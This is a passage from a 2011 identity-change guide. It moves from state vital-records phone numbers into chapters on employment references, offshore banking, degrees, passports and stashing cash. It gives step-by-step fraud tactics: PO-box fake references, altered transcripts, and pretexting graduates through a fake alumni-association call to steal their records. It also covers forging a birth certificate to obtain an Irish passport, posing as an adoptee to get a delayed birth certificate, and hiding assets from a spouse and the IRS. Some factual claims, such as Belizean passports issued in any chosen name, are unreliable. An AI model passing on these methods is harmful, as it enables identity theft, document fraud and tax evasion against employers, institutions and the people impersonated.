(302) 739-4721 +District of Columbia (202) 645-5962 +Florida (904) 359-6900 +Georgia (404) 656-4900 +Hawaii (808) 586-4533 +Idaho (208) 334-5988 +Illinois (217) 782-6553 +Indiana (317) 233-2700 +Iowa (515) 281-4944 +Kansas (785) 269-1400 +Kentucky (502) 564-4212 +Louisiana (504) 568-5152 +Maine (207) 287-3184 +Maryland (400) 764-3038 +Massachusetts (617) 753-8600 +Michigan (517) 335-8656 +Minnesota (612) 676-5120 +Mississippi (601) 576-7450 +Missouri (573) 751-6400 +Montana (406) 444-4228 +Nebraska (402) 471-2871 +Nevada (775) 684-4280 +New Hampshire (603) 271-4654 +New Jersey (609) 292-4087 +New Mexico (505) 827-2338 +New York (518) 474-3075 +New York City (212) 788-4520 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 180 - +Reproduction in any form is prohibited without written permission. + +North Carolina (919) 733-3526 +North Dakota (701) 328-2360 +Ohio (614) 466-2531 +Oklahoma (405) 271-4040 +Oregon (503) 731-4095 +Pennsylvania (724) 656-3100 +Rhode Island (401) 222-2811 +South Carolina (803) 734-4830 +South Dakota (605) 773-3355 +Tennessee (615) 741-1763 +Texas (512) 458-7111 +Utah (801) 538-6105 +Vermont (802) 863-7275 +Virginia (804) 225-5000 +Washington (360) 236-4300 +West Virginia (304) 558-2931 +Wisconsin (608) 266-1371 +Wyoming (307) 777-7591 American Samoa (684) 633-1222 +ext. 214 +Guam (671) 734-4589 +Puerto Rico (787) 728-7980 +Virgin Islands: +St. Croix (340) 773-4050 +St. Thomas (340) 774-9000 ext. 4621 or 4623 +Canal Zone - No phone number available, write to: +Panama Canal Commission +Vital Statistics Clerk +APOAA, 34011 +Employment References +Entering the employment arena with a new identity can be a +problem. If you’re lucky enough to have a friend who owns a +small business, they can provide you with an employment +reference. Others have approached small family businesses +with an offer to pay cash up front for a good reference. +While others have used the following system: They open a +commercial post box. When they apply for a job, they list +their last employer as ITT, AT&T, IBM or some other well- +known large international firm. On the employment +application they list an imaginary boss’s name and list their +local PO Box as their official business address. This way you +will receive the prospective employer’s reference request +© Copyright 2011, Ariza Research, All rights reserved - ABP - 181 - +Reproduction in any form is prohibited without written permission. + +letter yourself and will be able to reply to it in any way you +wish. Sneaky isn’t it? +This technique works because large corporations have +offices all over the country and most companies refuse to +provide phone references anymore. Lawsuits have made it +very dangerous to chat openly about former employees. +For that reason, today most employers provide only a +confirmation of past employment, dates of employment and +position title. In particular any discussion of job performance +or cause of termination can lead to expensive legal +problems. +It never fails to amaze me how easily most people will gladly +accept the most worthless documents as "proof" of this or +that. Income can be "proved" in a number of different ways +using all sorts of easily doctored forms. +Banking Security +Many freedom-loving individuals are busily transferring their +funds to "offshore" banks in the Caribbean these days. Is +this really necessary? Perhaps, but you should know that +there is one state right here in the good old US that will give +you better banking security than the other forty-nine. And +while it ain't Switzerland, it's better than nothing. +You can open a bank account in Nevada complete with a +Visa or MasterCard debit card. And since Nevada laws on +banking privacy are much stricter than any other state, your +financial information is comparatively secure. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 182 - +Reproduction in any form is prohibited without written permission. + +Nevada hasn't signed an information exchange agreement +with the IRS, so the tax boys will have to go to court if they +want access to your records. How good is this protection? +Provided you aren't involved in anything illegal - the +protection is quite good. If you're a criminal looking to +launder drug money - forget it. +Some have found the following tactic very effective. They +collect all their mail for a week or more. They leave the +envelopes pile up unopened. The day of your departure they +write "Deceased" across the front of each envelope in ink +and throw them all in the nearest mail box as they leave +town. +Offshore Tactics +First a note about the Cayman Islands: I’ve been to the +beautiful Caymans on many occasions. I’ve strolled the +stunningly beautiful Seven Mile Beach and have gone +swimming with the stingrays. As a tourist destination +Georgetown, Cayman is a wonderful spot – a real paradise. +But don’t listen when some actor in a movie or on the TV +show Law and Order mentions that some criminal has put +their funds in a Cayman bank where no one, including the +FBI can get at them. It used to be true but no longer. +In an effort to increase foreign investment, the Cayman +Islands have recently signed several international banking +agreements that have in effect opened their banking books +and made the Cayman Islands a former, not a current +offshore haven for illicit funds. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 183 - +Reproduction in any form is prohibited without written permission. + +Ron M. owned a small retail store in a Midwestern city. After +16 years of married life he began to suspect that his +marriage was headed for the rocks. +Ron didn't want a divorce, and even worse - he deeply +feared the financial damage a divorce would inflict upon his +future lifestyle. So he decided to take decisive action. +During his college years Ron became interested in collecting +coins. After buying many different kinds of coins, he found +US silver dollars particularly interesting. He spent long hours +reading coin books in the library and doing other research on +the Internet. +After two years Ron had became somewhat of an expert on +the subject of investing in US coins for profit. In his spare +time he began writing a guide on the subject. He was +convinced that such a book could be sold to the general +public at a nice profit. To speed the project along, he hired a +young college girl who did some "ghost" writing. In a few +short months he had his first draft. +He then launched a web site that offered instant online +access to his new book. Sales took off quickly and within a +few months he was taking in around a thousand bucks a +month. At this point he was confident that this was only the +beginning. He knew that if he would invest all his profits in +expanded advertising, his business would soon take off and +start bringing in some really serious cash. +He then assembled a "grub stake" of around three thousand +bucks and offered his wife a week-long vacation on the +lovely Caribbean island of Nevis. +While his wife was off shopping one afternoon, Ron stole +away and used his grub stake to open an offshore bank +account at a local Nevis bank, and also signed a contract +with a Nevis web host to register his site URL under his new +offshore corporate name, and set up his site hosting. +The bank also set up credit card merchant services and +even gave Ron his own MasterCard complete with full +international ATM access. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 184 - +Reproduction in any form is prohibited without written permission. + +Here's how Ron's new business venture worked. Customers +would go to Ron's site and purchase his book online using +their credit cards. His bank in Nevis would then process the +credit card transaction and deposit the funds in Ron's Nevis +bank account. +Ron could then withdraw cash at any ATM machine in the +world with his new MasterCard/ATM card. Or he could make +purchases at any vendor that accepted MasterCard credit +cards. +Either way the transactions would be entirely anonymous, as +the vendor would only see a short numerical code that +authorized the transaction and no other information. +And the best part is - since the entire business is conducted +offshore, no one (including his wife) would ever know the +details of his business activities or the level or even the +existence of his bank balance. (Banking privacy laws in +Nevis are extremely strict. In fact, anyone arriving in Nevis +who plans to penetrate their banking records can be slapped +in jail under Nevis law!) +Ron had another little goal I might mention. He hated the +IRS and used to rant on and on about the huge chunk the +IRS kept taking out of his hide. By locating his entire +operation offshore he could realize a very old dream. For the +first time in his life his business was entirely tax-free. (Most +offshore tax havens charge little or no tax on money earned +outside of their country.) Now you understand that I can't +endorse cheating the IRS but Ron felt it was more than +worth the effort. +Next came a major promotion. Ron plowed all his profits +back into the business. Sales grew handsomely over the +next year. Ron skimmed some other funds from here and +there which he transferred (by international money order) to +his exploding, tax-free Nevis bank account. +By the time the divorce finally occurred, Ron had arranged +things in such a way that his wife came away with but a +small slice of Ron's true wealth. Oh, she definitely suspected +that Ron was hiding something - but what could she do? Her +attorney ran a financial asset check on Ron but it came up +nickels and dimes! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 185 - +Reproduction in any form is prohibited without written permission. + +Today Ron and his new wife make regular trips to Nevis to +check on his rapidly ballooning bank balance and lounge in +the sun on the beautiful white sand beaches of the lovely +little island. +If you don't need to transfer a business offshore, you might +consider this. For two or three thousand you can have an +offshore corporation formed. Anyone who desires personal +and financial privacy can use such an entity in numerous +creative ways. Some kinds of offshore corporations can be +used to make investments anywhere in the world. +You open an offshore bank account in your corporate name +and use it to safely hide funds. Or you could use the +corporation for the purpose for which it was intended - to +conduct business. Your corporation could also be used to +own a trust which can be used to hide many kinds of +financial transactions. The opportunities are truly endless. +And how is this for a creative solution to a real problem? +Should any kind of investigator make an inquiry with your +offshore bank, you can have things set up so that the letter +triggers an immediate transfer of your entire account to yet +another bank located in yet another offshore banking haven! +How's that for security? I'm sure you can see why anyone +who attempts to investigate offshore banking accounts +knows they are faced with a supremely frustrating task. Most +know this all too well and so won't bother to try. +But be warned these offshore waters are full of cheats and +swindlers. Before you shell out any cash - be very, very sure +exactly who you are doing business with! +Suckers send off substantial sums by money order to +offshore operators who quickly vanish with their cash! Just +because they have a slick web site with a phone number and +mailing address doesn't mean they're legitimate. Do your +homework carefully! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 186 - +Reproduction in any form is prohibited without written permission. + +Offshore Update 2011 +Offshore banking ain’t what it used to be. Between January +2008 and November 2009 foreign deposits in the Swiss +National Bank dropped by over 28%. +In 2009 Swiss banks released the account information on +285 clients suspected of tax evasion by the IRS. +The Organization for Economic Cooperation and +Development (OECD) has reevaluated and reclassified 18 +former offshore banking countries from the “gray” +classification to “white” meaning they’re fully cooperating +with US officials. +This group includes such long-term offshore banking centers +as Switzerland, Liechtenstein and Luxembourg. The offshore +world is rapidly shrinking. +One obvious exception is Panama. Because of the critical +importance of the Panama Canal, the banks there are free to +ignore international pressure to open their books. +Liechtenstein released the account information of 1,250 +customers in February of 2008. +Offshore Banking in Austria +The privacy of banking account information in Austria is +protected by constitutional level laws that require a two thirds +majority vote of the parliament to alter so banking privacy is +well established. +The Austrian banks are well regulated and managed. Austria +is an EU member with a AAA sovereign debt rating and is a +member of the Euro community. The nation is highly stable +politically and has an extremely stable legal framework for +private wealth management. +The central American nation of Belize is not on any OECD +blacklist and has recently implemented new banking laws +and regulations that have helped establish it as an +increasingly attractive offshore banking center. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 187 - +Reproduction in any form is prohibited without written permission. + +In Belize they speak English, have a stable entirely +democratic government modeled on the British +parliamentary system, the locals are friends (though minor +theft is a constant and nagging problem), there is freedom of +the press, has very little corruption and is adopting well +thought out laws and regulations regarding business and +financial operations. +A home in Belize can be a real bargain though you’ll have to +come up with a whopping down payment as no-money-down +mortgages are unheard of. +The biggest bank in Switzerland UBS has agreed to not only +release the names of19,000 wealthy Americans who +maintain accounts with them but also admitted to breaking +U.S. laws by helping customers evade U.S. taxes. +They admitted they helped clients hide over $20 billion. +Along with the confession they also agreed to pay $780 +million in damages and also close all offshore accounts of +it’s American clients. +Be very careful when dealing with self-proclaimed offshore +experts. There are scam artists out there who will skillfully +separate you from your money. Be sure who you are dealing +with. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 188 - +Reproduction in any form is prohibited without written permission. + +Need a College Degree? +(Here are a half a dozen different methods) +Warning: Claiming a degree using these techniques could +leave you with a ticking time bomb in your resume. You +might lose a job, a promotion of actually get yourself +arrested in some jurisdictions. The author and publisher do +not advocate deceiving employers in this way. +There are several very different approaches to consider +here. A copy of a genuine transcript could be altered to +change the name and personal information at the top to +reflect a new identity and then several copies could be +made. Then when the subject of transcripts comes up in a +job interview, the copies could be just handed over. +Many employers will accept them if the applicant looks +convincing. +Or you could use an entirely different approach. Some have +actually used forged transcripts to get admitted to a new +university where they earned a more advanced graduate +degree. This is known as "leap-frogging". Isn't an MBA better +than a lowly BS? Or you could use a college level GED +certificate to gain entrance. (95+% of colleges accept them) +Or if an employer insists on receiving transcripts directly +from your university, you could provide them with the +school’s mailing address, which would be your commercial +PO Box. You then send them your transcripts. +Here is another approach that might harm an innocent +person's life so should be carefully used. A help wanted ad is +run aimed at someone with a degree in a desirable major. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 189 - +Reproduction in any form is prohibited without written permission. + +The offered salary should be generous yet believable. The +ad must state that the job requires the desired degree. +Then the applicants are combed for a likely match. By +sending out a standard employment application form (which +can be easily purchased at any office supply store) much +more detailed information on the applicant can be obtained. +The genuine transcripts can then be obtained directly from +the university. +Then there is always the alumni approach. You call the +alumni association of a good school and purchase an alumni +book for the department in your discipline. You can get some +useful info over the phone if you play your cards right. +Then call the prospect directly. Tell them that you're updating +the alumni association's data files and extract even more +info. You'll need birth date and student number. +Here is an interesting little list. It contains information on +some institutions of higher learning that are no longer in +business. And if they're no longer around, verifying a degree +with them is going to be a problem. This means that it's +probably impossible to verify whether or not you ever +attended classes or earned a degree with them. +Also, some of the schools listed below were not properly +accredited though some did sincerely attempt to provide +honest educational services. But if you're leaving your old life +behind and need an established educational qualification, +claiming a unverifiable degree from one of these belly-up +universities might be just the ticket. +For a more complete listing and for information on earning +accredited and unaccredited degrees, get a copy of "Bears' +Guide to Earning Degrees Nontraditionally" by John B. Bear, +Ph.D.s. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 190 - +Reproduction in any form is prohibited without written permission. + +Institution Name Location Degrees Offered +Abilene Christian Abilene, +M.S. in Management +University Texas +American College Sunnyvale, +Business/Finance +of Finance California +American National LaPalma, Undergraduate +University California Degrees +San +Bay Area Open Undergraduate +Francisco, +College Degrees +California +Boulder Graduate Boulder, +Masters - Psychology +School Colorado +California American Escondido, +M.S. in management +University California +College of San +International +Professional Francisco, +Business +Studies California +New +Franconia College +Hampshire +Franklin and Lancaster, +M.S. in physics +Marshall College Pennsylvania +Houston +Houston, +International Social Work +Texas +University +International Los Angeles, +Various - All levels +College of L.A. California +International St. Louis, Ph.D. +Graduate School Missouri Business/Education +Sacramento, +Justice University Law +California +Louisiana Central Metairie, +University Louisiana +Santa +Ocean University Monica, Law +California +Professional Phoenix, All levels - Mental +Studies Institute Arizona Health +Russell Sage +New York All levels - Education +College +Southeastern +Institute of Alabama B.S. in Engineering +Technology +University of Mid- Council All levels (inc. Ph.D.) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 191 - +Reproduction in any form is prohibited without written permission. + +America (Iowa) Bluffs, Iowa +Washington +Washington, +International B.A. +D.C. +College +Grand +Western Colorado +Junction, All levels +University +Colorado +Wyoming College +of Advanced Wyoming M.B.A. +Studies +There are two situations where these shortcut approaches +will definitely not work. Any job that requires a US +Department of Defense security clearance will require an in- +depth investigation. (all identity-changers should forget any +job that requires a high level security clearance) They aren't +happy just combing databases for negative information. +They actually go out and verify positive info. Interviewing +your college professors is a common practice in such cases. +Another problem area would be the pursuit of a officer's +commission in the US military. The FBI handles the +investigations for prospective military officers and these guys +are real pros who will personally contact your grade school +teachers to have a chat about your record way back then. +Every bit of your personal history will be confirmed and +verified. +The Academic Name Change +Here is a devious new approach. Though policies vary +widely, every university has been approached by at least +one graduate who has legally changed their name. Of +course they need to have the name on their official school +record changed. This may require a personal visit or the +intervention of a lawyer but either way - it can be done. Your +new birth certificate and your court name change decree will +do the trick. To be sure - it's an unusual request but not +entirely unheard of. +Demand that all future correspondence be carried on in your +new name only. +There will be a link between your two identities recorded in +the school's records, but that shouldn't provide any problems +under most circumstances. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 192 - +Reproduction in any form is prohibited without written permission. + +Here's another approach. Get a copy of this book: "Bear's +Guide to Non-Traditional College Degrees: How to Get the +Degree You Want" by John Bear. This book discussed a ton +of very interesting educational alternatives. Here you will find +hundreds of ways to obtain accredited and quasi-accredited +degrees. If you require a degree in a hurry, this is yet +another route you should explore. +And these days there are more and more universities +springing up on the web that offer online instruction in a host +of different disciplines. This area of academia will certainly +continue to explode as the years pass. +Go to google.com and do a search on "online education" and +look around. I'm sure we're within a year or two of a degree +that can be earned entirely by online study. +In the past there was only form of accreditation that mattered +when it comes to a college degree but today all that is +changing. California has introduced an entirely different +approach. Some California schools that haven't earned full +regional accreditation have managed to obtain state +accreditation instead. +In a nutshell this means that California employers will almost +always accept such a degree. But will employers in other +states accept these degrees? No one knows. This new +approach to accreditation is so new few employers have an +established policy. +Crystal Cathedral Bust +Over the past few years a number of major religious schools +have been caught dealing in academic degrees. The usual +deal the churches have with state governments goes +something like this. They're allowed to organize schools and +grant as many degrees as they please without having to go +through the usual academic accreditation providing they only +grant degrees having to do with religion. Degrees in +theology, bible study, choir directing or ministerial degrees +are the usual fare. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 193 - +Reproduction in any form is prohibited without written permission. + +But money-hungry churches often get entangled in the illegal +peddling of other more popular academic degrees. If a nice +member of their church, who has been a very generous +contributor to the building fund asks if they can't manage to +grant her a degree in accounting - they can't help but +consider her situation. After all, she has extensive +experience as a bookkeeper. +And there is the issue of the two kids she's trying to support. +The church may also be eager to get a fist full of her money. +The result? They quote her a price and then crank out a +degree and enter the necessary transcripts in their official +records. Of course all this breaks state laws but who is going +to spill the beans? Everyone gets what they want so what +can be wrong with that? +This situation may open the door for any degree-hungry +identity-changer. If you get into a rapidly-expanding +monetarily motivated church, you can never tell what kind of +degree you could end up with. The best schools for our +purposes are those who have bland names like "South +Wynfield College" instead of more religious sounding names +like "God the Supreme Creator College, in East Jesus North +Carolina". +If You Own a Computer +If you own a computer and a laser or inkjet printer, you may +want to consider purchasing a "desktop publishing" program. +Desktop publishing programs make it easy to quickly and +easily create all sorts of identity documents that appear very +genuine. +The best one I know of is Microsoft’s "Publish". There are +more powerful programs out there but this one is by far the +easiest to use and does an excellent job. It can also be used +to create professional looking resumes, business envelopes +and even brochures and sales letters. +The program includes a long list of automated wizards that +can be used to create documents if you don’t wish to take +the time to learn the programs commands. They couldn’t +make it any easier. You tell the program exactly what you +want. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 194 - +Reproduction in any form is prohibited without written permission. + +And the program automatically creates the document right in +front of your eyes with little no intervention. And with the +improved print quality of today's inkjet printers, the product +can be extremely professional looking. +One guy I know used Publish to create several very +professional-looking "employee identification" badges and +cards. The first one took about an hour but once he created +the blank template, making additional versions took only a +few minutes. Ain't technology wonderful? +The Clothes Make the Man +Have you ever read the book or seen the movie - "Catch me +if you can" by Frank Abagnail? No? Get a copy as soon as +you can. The real-world hero of this story slipped into and +out of a half dozen entirely different identities over more than +a decade. His favorite was airline pilot. +He called the headquarters of a major international airline. +Posing as a pilot who had lost his uniform he obtained the +name and address of the airline's local contract tailor. He +then went to him with a sad story. He was an airline pilot +who had just come to town but had left his uniform in some +other city. +He's made this same mistake several times this year so he's +afraid he'll be fired if the airline finds out. Can the tailor bail +him out by quietly providing him with a new uniform? +He volunteered to pay any price in cash. In the end the tailor +made one up in only 24 hours and charged the entire cost to +the airline! +When he put it on he quickly discovered the overwhelming +power of a uniform. He would get respect from everyone he +spoke with. The hotel hardly looked at his identification and +treated him like a king. He could easily cash checks +anywhere. +He flew all over the world for free (employees fly free on their +own airline). And he also found that a uniform can have a +really remarkable effect on the ladies. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 195 - +Reproduction in any form is prohibited without written permission. + +This guy flew all over the world first class and had a ball. Is +there a uniform in your future? He then went on to pose as a +doctor, and a college professor! +The movie is great fun but provides almost no detail, but the +book has a full discussion of all the methods he used and +should be carefully studied by anyone interested in creating +and living under an assumed identity. +DMV Madness +For several years numerous DMV departments began selling +personal drivers license information to various commercial +firms. When asked - the beaurocrats would say that they +"restricted" the sales to "proper" buyers only. +But who are these "proper" entities? From what we've seen +it's anyone who has a few bucks. You can see why such a +practice would surface right now. States and counties are +hard-pressed for sources of income right now. Many states +are struggling with huge deficits and reluctantly cutting +budgets and laying off employees. So every possible source +of income must be fully exploited. +Well, all this idiocy backfired in a terrible way. TV actress +Rebecca Schaeffer was murdered by a fan who got her +address from the Los Angeles DMV. Because of this sad +incident, agencies all over the country quickly introduced +new restrictions. +Today, access is severely restricted. But it's far from private +so keep that in mind. +Ready for a World Tour? +If you're interested in traveling or living overseas, you should +get a copy of "The world's most dangerous places" by +Robert Young Pelton. It'll give you some really interesting +things to think about. This guy has really scoured the globe +for interesting places. And what is the single most interesting +dangerous place in the world? The good old USA! It's listed +in the book right alongside all the backward banana +republics! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 196 - +Reproduction in any form is prohibited without written permission. + +If you're really serious about living overseas, want complete +financial privacy and like hot tropical weather and white +sandy beaches - you might want to take a long look at +Belize. Belize used to be called British Honduras and is +located in the middle of the Yucatan peninsula. The banks +are very private (when you open an account they issue you a +MasterCard debit card that can be used anywhere in the +world). English is the official language. The locals are +friendly (though they'll steal anything that's not tied down). +You can set up a private corporation that can do anything +you'd like without anyone being able to find out who is +behind it's operations. +The cost of living is a small fraction of that in the US or the +Bahamas (you'd have to be a multi-millionaire to live in the +Bahamas). Real estate is still relatively cheap (though you'll +have to come up with a down payment of at least 35% if you +want a mortgage). And medical care is readily available and +costs around one-third the US price. +For $40,000 or so the government will issue you a Belizean +citizenship complete with an official passport in any name +you'd like. To sweeten the deal they'll also throw in a +Belizean driver’s license. Since Belize is a member of the +British Commonwealth, you can travel freely among the +nations of the old British Empire. +But be warned the place isn't for everyone. Be sure to pay +Belize a visit for at least two weeks to check it out if you're at +all interested. Some people can't take the heat, the lousy +phone service and the unimproved roads. The +communication system leaves a lot to be desired so high- +quality Internet access is probably a few years away. +Think that buying a citizenship sounds like a sleazy and +corrupt practice that only a backward "banana republic" +country would offer? Most countries sell their +citizenships/passports. How do you think all those Nazi war +criminals got into the US right after the Second World War? +You can buy an Irish citizenship along with a passport and +drivers license for a whopping $1,650,000! (You can get one +for free if one of your grandparents was born in Ireland) If +either of your grandmothers was Jewish, you can always +become a citizen of Israel. France and Germany have similar +programs. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 197 - +Reproduction in any form is prohibited without written permission. + +"Top of the Mornin' to Ya!" +When I was a teenager I had a friend named Tom. He was a +nice enough guy who I lost contact with after high school. +Some years ago I heard he had gotten himself into some +serious financial problems. In one of life's happy little +surprises I ran into a mutual friend recently. Eventually our +conversation got around to Tom and his current +whereabouts. +"Oh, yea - Tom started a business with a friend and the +bastard ran off with his wife and all the money in the +business. Tom was left holding the bag. Big legal and +financial problems he couldn't get out from under - even +though he tried for over a decade" When I asked what +happened, my buddy told me a very interesting story you +might just find amusing. +It seems that Tom reached the point that he just gave up. +Try as he might the problems just kept right on coming and +soon his debts had accumulated to the point he knew he +would never pay them off. With no end in sight Tom came up +with what I consider a really sneaky way out. He changed his +identity. He adopted a common Irish last name - like Sullivan +or Murray. He then forged a new birth certificate complete +with an "official" seal using the methods revealed above. +Now here is where it gets really interesting. He then used his +very official looking identity documents to convince the Irish +government that he was, in fact, a true and real son of the +emerald isle. +Through an Irish genealogist he located some nice Irish +grandparents from Dublin (long since deceased of course) In +this way he qualified for an Irish citizenship and (and this is +the most important part) his very own brand new Irish +passport. (Ireland has a policy of granting citizenships to +those who can establish (on paper) their Irish ancestry). +Of course, obtaining a citizenship/passport using this method +would break some laws so I'll trust you to keep this +information a deep secret and never use it in any improper +way. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 198 - +Reproduction in any form is prohibited without written permission. + +And here is another interesting tidbit of information - certain +classes of Irish citizens are exempt from paying the painfully +high income taxes Ireland is famous for. (Artists, writers, and +other creative types) +Adopted People +There’s one group of people who face a unique problem. +People who were adopted as infants can run into a real +problem when they attempt to obtain a copy of their birth +certificate. +In most states the birth records are legally "sealed". This is +done to protect the biological parents from being contacted +by their offspring. Most adopted parents sign away their +parental rights and are eager to get on with their lives as if +the birth had never occurred. The courts recognize their right +to privacy and so keep the records under lock and key. +But today things are changing. Several states (including +Tennessee and Kansas) have recently opened up their +records. Courts there still recognize the original parent's +rights but have given priority to the adopted offspring's desire +to acquire information on their background. (Often this +information is needed for medical reasons) +Why am I telling you all this? Anyone who claimed to have +been adopted as a baby would find themselves in a rather +interesting position. If no birth certificate could be found in +the official record, they would be forced to apply for a +delayed birth certificate. +What makes this attractive is the simple fact that most vital +records offices tend to be sympathetic to the plight of an +adoptee. +Most adopted people don’t have the usual birth certificate on +record. Depending on the state's laws, the clerks may or +may not provide access to the record. +And then there are those cases where the adopting parents +have altered the birth record (including the birth certificate) to +make it appear that their adopted child was, in fact, their +own. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 199 - +Reproduction in any form is prohibited without written permission. + +Stay tuned, as it gets even more interesting. During the +period 1950-1973 thousands of Irish babies born out of +wedlock were shipped across the Atlantic to the USA. They +came from church-run "homes for unwed mothers" in Ireland. +Ireland is a very Catholic nation that looks down its nose at +illegitimate babies. +This can mean a lifetime of discrimination for those, who no +fault of their own, were born outside the confines of a proper +church sanctioned marriage. In America we have a much +more open-minded attitude concerning illegitimacy. +Unfortunately (for those people who arrived here in this way) +or fortunately (for our purposes) these individuals didn't have +any kind of birth certificate officially filed here in the US. Most +vital record offices know about these people and will usually +be accommodating when it comes to issuing a delayed +record of birth. +If you have a somewhat Irish appearance and/or surname, +you might want to consider joining this unfortunate pool of +individuals. These people are in an interesting situation as +they lack the usual background documents and may qualify +for a considerable degree of special treatment. It’s an +interesting story – don’t you think? +New Phone Traps +There are some new high-tech traps out there that you +should know about. Private Investigators and skip tracers +now employ some phone tricks that can cause you problems +if you don't know about them. +First there is the "trap line". One of your relatives receives a +letter from some lawyer in a distant state that has a +substantial check for you but is having a problem locating +you to give you your loot. +The letter includes a convenient toll-free phone number for +you to call. If you do call, the number you're calling from is +immediately revealed and captured and used to locate you +and blow your cover. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 200 - +Reproduction in any form is prohibited without written permission. + +And now for the really tricky stuff: You, or a close relative, +receives a really nice free gift. It's one of those prepaid toll- +free calling cards. You just dial the toll-free number on the +back of the card, enter the secret password on the card and +get an hour or more of entirely free long distance service. +It says it's good for 60 or 90 minutes of free long distance +calls. If you use it, both your number and the numbers you +call will be logged and revealed to the investigator who sent +it out. Either way you lose your privacy. +Wealth Mobility Update +On September 6, 1999 an American fugitive named Martin +Frankel was arrested in Germany where he had fled after +allegedly stealing a large sum (reports vary anywhere from +$100 million to over three billion) from investors and banks in +the US. Local police reported that his hotel room contained +around a hundred grand worth of gold and rare coins and +over $10 million in large diamonds. +Why the gold and the diamonds? US federal law limits +anyone from taking more than $10,000 out of the US without +a special permit. And because the US treasury no longer +prints bills larger than $100, it would be very difficult indeed +to carry around large sums of money. +In contrast, gold and diamonds are very liquid (they can be +easily sold for ready cash no matter where in the world you +happen to wander), are entirely untraceable and can be +used to easily store or smuggle large sums in very small +packages. +Just after the communist revolution in Russia, the Czar and +his family were executed. The communists herded the entire +family into a small room and opened fire with an assortment +of firearms. Strangely it took a long barrage of gunfire to +finally do them all in. +When their clothing was searched it was found to be loaded +with jewels. Many were sown into the hems and down the +front seams of their coats. They had made their bodies +almost bullet proof by covering themselves in jewels! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 201 - +Reproduction in any form is prohibited without written permission. + +Just before the murders the Czar had been clandestinely +arranging their escape to Switzerland where the jewels +would have come in very handy. So you can see that the use +of jewels as a portable form of wealth is not a new tactic. +Done right - its still quite effective. +Be careful however. Rookies eager to buy large investment- +grade diamonds for cash are obvious targets for fraud. Due +to recent advances in technology the diamond markets are +flooded with coated and treated "simulants" (fake diamonds) +that will pass most tests but are worth little or nothing. +Some diamonds have been injected with liquid glass, which +makes their internal flaws invisible. (Temporarily) +Others have been coated in a way that artificially improves +their appearance. Even the experts get fooled these days. +You don't want to buy a stone in location A that's declared to +be worthless when you get to location B. Sadly, this happens +all the time. Deal with reputable sources whenever possible +and never, ever go through customs with anything in your +luggage that might indicate an interest in jewels. If you do +your clothes and luggage will be torn to shreds by an +overeager customs inspector. +Store Your Stash! +Where should you store your cash stash and identity +documents until you're ready to skip town? The first thought +most people have is to run down to their local bank and rent +a safe deposit box. Wrong. There are all sorts of laws and +banking regulations that apply to safe deposit boxes. +Any law enforcement type can flash a badge and gain +access. The mere fact that you have a box will be recorded +in several different databases under your name and SSN. An +online SSN verification will be required before a bank will +provide you a new box. +Though those nice people down at the bank appear +harmless enough on the surface, in today's emerging police +state they are key information sources for big brother. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 202 - +Reproduction in any form is prohibited without written permission. + +They'll never tell you to your face but every time you move +more than a few hundred bucks around, they promptly report +your dealings to the feds (try searching the web for info on +"FinCen" for more details of federal banking monitoring). +They smile and speak to you politely - but they are not your +friends. +The best bet here is to use either a commercial box rental +firm where your box will be much safer from prying eyes or +better yet, your friendly local storage locker company. +You may be able to get full 24-hour access to your locker +and many of the storage locker outfits will also allow you to +use your own lock. If they don't, keep searching until you find +one that does. +Then go out and buy a really good lock. Consult with a local +locksmith. Some new high tech locks have recently hit the +market. They cost a bit more but will help ensure a higher +level of security for your stuff. +Master lock recently released new tamper resistant padlocks +that include a forged collar that covers most of the shackle +making it almost impossible to cut. I'm sure the government +will eventually require online drivers’ license verification at +some point in the future, but for now I've yet to hear of a +storage locker place that does. You should be able to rent +the locker using almost any kind of ID without too much +trouble. Just be very sure that their rental bill is paid regular +as clockwork. +Ask if they allow a discount for pre-payment, take advantage +of it. If you forget to pay, they will have the right to open your +locker and auction off your items, which would not be a good +idea. +Never, ever claim your storage locker or safe deposit fee as +a deduction on your taxes. The IRS takes a special note of +such deductions. +When you rent your locker pay several months rent in +advance in cash and then after that pay by mail with money +orders. If the application asks for your SSN and/or license +tag number, be very careful about giving them the wrong +information. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 203 - +Reproduction in any form is prohibited without written permission. + +Destroy the receipt or hide it somewhere away from your car +and residence where it will be safe. Hide the key in the same +manner or just add it to your key ring along with the others. +You can always claim to forget what the key was for. +Have no further contact with the staff. Come and go when +the front office is closed. Don't appear to be doing anything +that would arouse suspicion. Most of these places have +video cameras that scan each isle. There are those who +have removed the bulb that illuminates their rear license +plate to make vehicle identification more difficult. +Store your stuff in those letter sized document storage boxes +the office supply stores sell. Seal each box with wide +masking tape so that anyone who attempts to gain access +will leave telltale damage to the tape. Write "old business +records" or "Christmas lights" on the outside of the boxes. +This will discourage anyone who might gain access to your +locker. +If you want to you can store some cash and other +documents in your residence securely by simple wrapping +them in aluminum foil and writing "FISH" on the package +using a frozen food pen. Who would ever take the time to go +through the frozen good in your freezer? (You've heard of +cold cash haven't you?) +More Big Brother Garbage +Update: The following restrictive policy has been +temporarily suspended until further notice: +Our dear friends in the US postal service have recently come +up with a diabolical scheme that will probably put the +commercial mailbox firms out of business. This new rule will +make it impossible to use a commercial mail box and have it +appear to be a normal street address. Instead your address +will have to include the letters PMB (Private Mail Box) +followed by your box number. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 204 - +Reproduction in any form is prohibited without written permission. + +Old Format: (looks just like a street address) +John Jones +123 Main Street Suite 